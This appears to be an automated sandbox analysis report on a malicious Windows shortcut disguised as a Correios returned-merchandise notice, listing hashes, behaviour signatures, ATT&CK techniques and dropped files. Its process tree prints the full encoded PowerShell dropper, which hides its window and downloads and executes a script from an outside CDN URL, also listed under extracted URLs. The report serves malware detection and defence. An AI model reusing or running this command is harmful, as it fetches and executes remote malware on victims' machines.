858c09f6032b213e8cb62f48d6ecb7237637e9eea5866973905d6c1f13a81bdf

Analysis

max time kernel
122s
max time network
128s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
13-09-2024 19:03

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Mercadoria_Devolvida-Correios-22ES4D25.lnk
Size

3KB
MD5

246e74b6fffb9d5994f7f70bb6509b45
SHA1

4b7bdf4808ce987b9f94ea40bdd081217867483a
SHA256

0db8cc27123c8bbd5ae0139980b604c514caeeed51da22d67d440e5369f8be1e
SHA512

178cf1ff0d8213ff94de68f5c1c267d50c3a958126925a2c50a554a29229c6f6834d1bf140fdb9f7168352d068880c7730e047e177496af0a8b57dde62fd8e08

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://1361227624.rsc.cdn77.org/v2/gl.php?aHR0cHM6Ly8xMzYxMjI3NjI0LnJzYy5jZG43Ny5vcmcvdjJ8d3IzMQ%3D%3D%

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
5	2244	powershell.exe
6	2244	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2244	powershell.exe
2244	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2244	powershell.exe

Suspicious use of WriteProcessMemory 9 IoCs

description	pid	Process	procid_target
PID 2060 wrote to memory of 2244	2060	cmd.exe	31
PID 2060 wrote to memory of 2244	2060	cmd.exe	31
PID 2060 wrote to memory of 2244	2060	cmd.exe	31
PID 2244 wrote to memory of 2732	2244	powershell.exe	32
PID 2244 wrote to memory of 2732	2244	powershell.exe	32
PID 2244 wrote to memory of 2732	2244	powershell.exe	32
PID 2732 wrote to memory of 2592	2732	csc.exe	33
PID 2732 wrote to memory of 2592	2732	csc.exe	33
PID 2732 wrote to memory of 2592	2732	csc.exe	33

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\Mercadoria_Devolvida-Correios-22ES4D25.lnk
1⤵
- Suspicious use of WriteProcessMemory
PID:2060
- C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe" -en YQBEAGQALQB0AFkAUABFACAALQBOAGEATQBFACAAQQAgAC0ATQBFAE0AYgBlAFIAZABlAGYAaQBOAEkAVABpAG8AbgAgACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQAgAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGIAbwBvAGwAIABTAGgAbwB3AFcAaQBuAGQAbwB3ACgAaQBuAHQAIABoACwAIABpAG4AdAAgAHMAKQA7ACcAIAAtAE4AYQBtAGUAUwBQAEEAQwBFACAAQgA7AFsAQgAuAGEAXQA6ADoAUwBIAE8AdwBXAGkAbgBkAE8AVwAoACgAWwBzAFkAUwB0AGUAbQAuAGQAaQBhAEcATgBvAHMAdABpAEMAcwAuAFAAcgBvAEMAZQBzAFMAXQA6ADoARwBFAFQAYwB1AFIAcgBlAG4AVABwAFIAbwBDAGUAcwBzACgAKQAgAHwAIABQAFMAKQAuAG0AYQBJAG4AVwBJAE4ARABvAHcASABBAG4AZABsAGUALAAwACkAOwBJAEUAeAAoAE4ARQB3AC0AbwBCAGoAZQBDAHQAIABOAEUAVAAuAHcARQBCAGMAbABJAEUAbgBUACkALgBEAG8AVwBOAGwATwBhAEQAcwB0AFIASQBOAEcAKAAnAGgAdAB0AHAAcwA6AC8ALwAxADMANgAxADIAMgA3ADYAMgA0AC4AcgBzAGMALgBjAGQAbgA3ADcALgBvAHIAZwAvAHYAMgAvAGcAbAAuAHAAaABwAD8AYQBIAFIAMABjAEgATQA2AEwAeQA4AHgATQB6AFkAeABNAGoASQAzAE4AagBJADAATABuAEoAegBZAHkANQBqAFoARwA0ADMATgB5ADUAdgBjAG0AYwB2AGQAagBKADgAZAAzAEkAegBNAFEAJQAzAEQAJQAzAEQAJQAnACkA
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2244
- - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\vxk8zkzu.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2732
  - - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD0B8.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCD0B7.tmp"
      4⤵
      PID:2592

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RESD0B8.tmp

Filesize
1KB

MD5
fedad8d68b2b33ec94e8fff3937cad85

SHA1
dc9fb1d0bb9bf705c9ef6f21aeced0b32540cdb9

SHA256
dbaf8f06f787e0060ffe500db8112e5bb2aeccb18a5f267e822b7337aba23aed

SHA512
a406c413b9d0ecb1f5f6d16ff5b221b84e5b11768f5055b17642de17bb5da2bdcfac8253219185cfe9ee2233d1c96ea767231680688d49d681092a81762b7a7f

Download Submit
C:\Users\Admin\AppData\Local\Temp\vxk8zkzu.dll

Filesize
3KB

MD5
e3fbde7a04181254a85dcd547a50da3e

SHA1
8116bc86953316a1117cf909d6e10e4a74b29f80

SHA256
582f4860b8d9743f86cfac0f09680ce3004f85f251acf2a9ba78dbd999f19c93

SHA512
6f3379601646e5dbeb97cdbd068f4d31df8eec338fd71f4ca24924974f303403a424e351e7268ec24dc232bd585fcf34b848d671af1b1ccfc1b2f18066d77242

Download Submit
C:\Users\Admin\AppData\Local\Temp\vxk8zkzu.pdb

Filesize
7KB

MD5
f71ba516c828ac43cf247c7108a39f5d

SHA1
13e0f9dd56eda83142027b460eb2ce345ea790bb

SHA256
d15672d5fc4646cf065692d0e7bca3e5af8035c418daef0ee3fb446c7935a48c

SHA512
f6c24cecae15d633e5a27a72c0868c96b871f147f0c388c6278bdd2ace1037eea0883a31119fe04b6b273fe7350a4c045953db541ec33a76c8ecd44a5ab47b25

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSCD0B7.tmp

Filesize
652B

MD5
a6aa4b3f542772a26186c1d37f90129f

SHA1
7a673e2fbd87e754a52117b2a31a16e2559b0bae

SHA256
e9db846e2debdb72a31fec8ea7e65084f59315e128306a30f0dbf53ae705d75e

SHA512
e144d9c01592885239da3d839b100e9c641b4f53a41499d164f427c6684e10c168897d95a4edc28550c959ec89795aaf9aff1cdae37fa8f0b91cf8c76cf63b4f

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\vxk8zkzu.0.cs

Filesize
187B

MD5
7b0e7177dfbb9edd1c1ef08b4fdfae2f

SHA1
cb11a0252cdad66ec247312ccb7feb46456e52b6

SHA256
6caf22ef995616dc37bec21b2af3aa4597cdad88e00a13de0122db3af4e9a4aa

SHA512
7322be891145e550405917757420aeb513e5689970d34647177b1a79a12c7776d4e49c129b093be9927b46bc7582c0379e0cb520af58d4410ed4c5ef98b4dbfd

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\vxk8zkzu.cmdline

Filesize
309B

MD5
6ccce0d846bf806aa92a7d87b702d1fd

SHA1
c9006e10de84baf75db121ff867cb76edc609732

SHA256
550b96eaa261382b30453351c7551fc2e945132546111d232f83bb8b8d2776d5

SHA512
a47f1d0d232c771559dc768da5a378996b7c280a4a658141cfe4ca0989361819bc96d43057fba2fcbd6757948dd326ae518d60b3ebedc85d34e5a89a93a6e5a7

Download Submit
memory/2244-38-0x000007FEF54CE000-0x000007FEF54CF000-memory.dmp

Filesize
4KB

Download
memory/2244-43-0x000007FEF5210000-0x000007FEF5BAD000-memory.dmp

Filesize
9.6MB

Download
memory/2244-48-0x000007FEF5210000-0x000007FEF5BAD000-memory.dmp

Filesize
9.6MB

Download
memory/2244-42-0x000007FEF5210000-0x000007FEF5BAD000-memory.dmp

Filesize
9.6MB

Download
memory/2244-41-0x000007FEF5210000-0x000007FEF5BAD000-memory.dmp

Filesize
9.6MB

Download
memory/2244-40-0x0000000002000000-0x0000000002008000-memory.dmp

Filesize
32KB

Download
memory/2244-58-0x0000000002680000-0x0000000002688000-memory.dmp

Filesize
32KB

Download
memory/2244-39-0x000000001B180000-0x000000001B462000-memory.dmp

Filesize
2.9MB

Download
memory/2244-61-0x000007FEF5210000-0x000007FEF5BAD000-memory.dmp

Filesize
9.6MB

Download